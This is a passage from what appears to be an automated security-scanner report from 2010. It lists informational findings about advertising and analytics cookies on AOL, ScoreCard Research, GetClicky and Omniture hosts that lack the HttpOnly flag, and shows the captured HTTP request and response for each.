The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /addyn/3.0/5113.1/221794/0/-1/size=300x250;cfp=1;rndc=128911028;noperf=1;alias=93247227;kvmn=93247227;target=_blank;aduho=300;grp=110284391;misc=110284391 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; CfP=1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986;expires=Tue, 6 Nov 2012 6:11:27 GMT;domain=at.atwola.com;path=/
Content-Length: 4641

document.write("<!--*\n");
document.write("O&O - Flash - MultiClick\n");
document.write("*-->\n");
var PAswf = "http://aka-cdn-ns.adtechus.com/apps/10/Ad0St3Sz170Sq0V1Id1690634/DTC_DPNP_HelpingHands
...[SNIP]...

10.5. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=61x21  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /addyn/3.0/5113.1/221794/0/-1/size=61x21

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /addyn/3.0/5113.1/221794/0/-1/size=61x21;noperf=1;alias=93309869;cfp=1;noaddonpl=y;kvmn=93309869;target=_blank;aduho=300;grp=110286297;misc=110286297 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; CfP=1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Content-Length: 109
Set-Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986;expires=Tue, 6 Nov 2012 6:11:28 GMT;domain=at.atwola.com;path=/

document.write("<!-- *\n");
document.write("AOL - HTML - Blank HTML Ad\n");
document.write("* -->\n");



10.6. http://b.aol.com/vanity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.aol.com
Path:   /vanity/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vanity/?ts=1289110282906&h=www.aol.com&v=9&t=AOL.com%20-%20Welcome%20to%20AOL&r=http%3A%2F%2Fcreativeby2.unicast.com%2Fassets%2FA23%2FN1405%2FM9880%2FC337926%2FAOL_Orange_300x250_imu_swf.swf&l=0&ms=1&dL_ch=us.aolportal&ver=1&dL_dpt=newaol%20portal5%20AOL.com%20Main%2010x7&template=main&cobrand=portal5&plids=145774%7Centertainmentnews%7Ccwell%7C5%2C182420%7Cfinancenews-promo%7Ccwell%7C4%2C182732%7Cdl1%7Ccwell%7C1%2C101839%7Centertainmentnewsrss%7Ccwell%7C5%2C182599%7Centertainmentnews-promo%7Ccwell%7C5%2C182700%7Csportsnews-promo%7Ccwell%7C6%2C99763%7Cadhocbottomjs%7Crcol%7C9%2C182741%7Csportsnews%7Ccwell%7C6%2C182724%7Ctopnews-promo%7Ccwell%7C2%2C182659%7Cfinancenews%7Ccwell%7C4%2C182739%7Ctopnews%7Ccwell%7C2%2C181656%7Cprodsvcs%7Clcol%7C3 HTTP/1.1
Host: b.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/?ncid=bannadusaolp00000044
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 06:11:25 GMT
Server: Apache
Set-Cookie: MUNAUTHID=1.da09552aea3511df901a37c95ae35e4c.034d; expires=Sun, 08-May-2011 21:05:48 GMT; path=/; domain=b.aol.com
Set-Cookie: UNAUTHID=1.da09552aea3511df901a37c95ae35e4c.ca17; expires=Sun, 08-May-2011 21:05:48 GMT; path=/; domain=.aol.com
Set-Cookie: CUNAUTHID=1.da09552aea3511df901a37c95ae35e4c.ca17; expires=Sun, 07-Nov-2010 18:11:25 GMT; path=/; domain=.aol.com
Cache-Control: max-age=0
Expires: Sun, 07 Nov 2010 06:11:25 GMT
Content-Length: 42
Content-Type: image/gif

GIF89a.............!.......,...........D.;

10.7. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?rn=38922149&C1=2&C2=1000009&C4=http%3A%2F%2Fwww.aol.com%2F&C5=us.aolportal&C7=http%3A%2F%2Fwww.aol.com%2F&C8=AOL.com%20-%20Welcome%20to%20AOL HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/?ncid=bannadusaolp00000044
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cb1dc5-204.0.5.41-1286583196

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 07 Nov 2010 06:11:26 GMT
Connection: close
Set-Cookie: UID=cb1dc5-204.0.5.41-1286583196; expires=Tue, 06-Nov-2012 06:11:26 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.8. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3000005&d.c=gif&d.o=wdgespinternational&d.x=176193424&d.t=page&d.u=http%3A%2F%2Fwww.cricinfo.com%2Fci%2Fcontent%2Fpage%2F417881.html HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.cricinfo.com/ci/content/page/417881.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cb1dc5-204.0.5.41-1286583196

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 07 Nov 2010 06:09:59 GMT
Connection: close
Set-Cookie: UID=cb1dc5-204.0.5.41-1286583196; expires=Tue, 06-Nov-2012 06:09:59 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

10.9. http://in.getclicky.com/in.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.getclicky.com
Path:   /in.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /in.php?site_id=226163&res=1920x1200&lang=en&secure=0&href=%2FReplica-Cricket-Kit%2F2009%2520England%2520Replica%2520Clothing.aspx&title=2009%20England%20Replica%20Clothing%20%3A%20cricshop.com&ref=&jsuid=1881286022853182851&mime=js&x=0.6341367335990071 HTTP/1.1
Host: in.getclicky.com
Proxy-Connection: keep-alive
Referer: http://www.cricshop.com/Replica-Cricket-Kit/2009%20England%20Replica%20Clothing.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 06:10:39 GMT
Server: Apache
X-Powered-By: PHP/4.4.4-8+etch6
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: cluid=1881286022853182851; expires=Thu, 07 Nov 2030 07:10:39 GMT; path=/
P3P: CP='NOI DSP COR CUR OUR NID NOR'
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 0


10.10. http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s28736884680110  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.sa.aol.com
Path:   /b/ss/aolcommem,aolsvc/1/H.21/s28736884680110

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/aolcommem,aolsvc/1/H.21/s28736884680110?AQB=1&ndh=1&t=7/10/2010%201%3A11%3A26%200%20300&ns=aolllc&cl=63072000&pageName=acm%20%3A%20newaol%20main5%20AOL.com%205.0%20Main&g=http%3A//www.aol.com/%3Fncid%3Dbannadusaolp00000044&r=http%3A//www.aol.com/%3Fncid%3Dbannadusaolp00000044&cc=USD&ch=us.aolportal&v0=bannadusaolp00000044&events=event10&c1=acm%20%3A%20newaol%20main5%20AOL.com%205.0%20Main&c2=acm%20%3A%20&c3=gmt_5&c10=external%20web%20browser&c12=http%3A//www.aol.com/&c13=non-authenticated&c14=www.aol.com&v14=acm%3A45&c15=unavailable&c16=no_location&c17=theme_default-prism_main5&v18=bannadusaolp00000044&v19=bannadusaolp00000044&c20=newaol%20main5%20AOL.com%205.0%20Main&c24=uaid_1.da09552aea3511df901a37c95ae35e4c.ca17&c49=H.21-May2010%7Cmmx_1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1128&bh=991&p=Google%20Gears%200.5.33.0%3BShockwave%20Flash%3BAdobe%20Acrobat%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: o.sa.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/?ncid=bannadusaolp00000044
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.da09552aea3511df901a37c95ae35e4c.ca17; CUNAUTHID=1.da09552aea3511df901a37c95ae35e4c.ca17; s_sess=%20s_eVar17%3DInitial%2520Engagement%3B%20s_eVar20%3Dbannadusaolp00000044%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B; s_pers=%20s_lastvisit%3D1289110284434%252Cbannadusaolp00000044%7C1296886284434%3B%20s_getnr%3D1289110286328-New%7C1352182286328%3B%20s_nrgvo%3DNew%7C1352182286333%3B

Response

HTTP/1.1 302 Found
Date: Sun, 07 Nov 2010 06:11:28 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|266B2188051D0EF9-6000012CE00A6B91[CE]; Expires=Tue, 6 Nov 2012 06:11:28 GMT; Domain=.aol.com; Path=/
Location: http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s28736884680110?AQB=1&pccr=true&vidn=266B2188051D0EF9-6000012CE00A6B91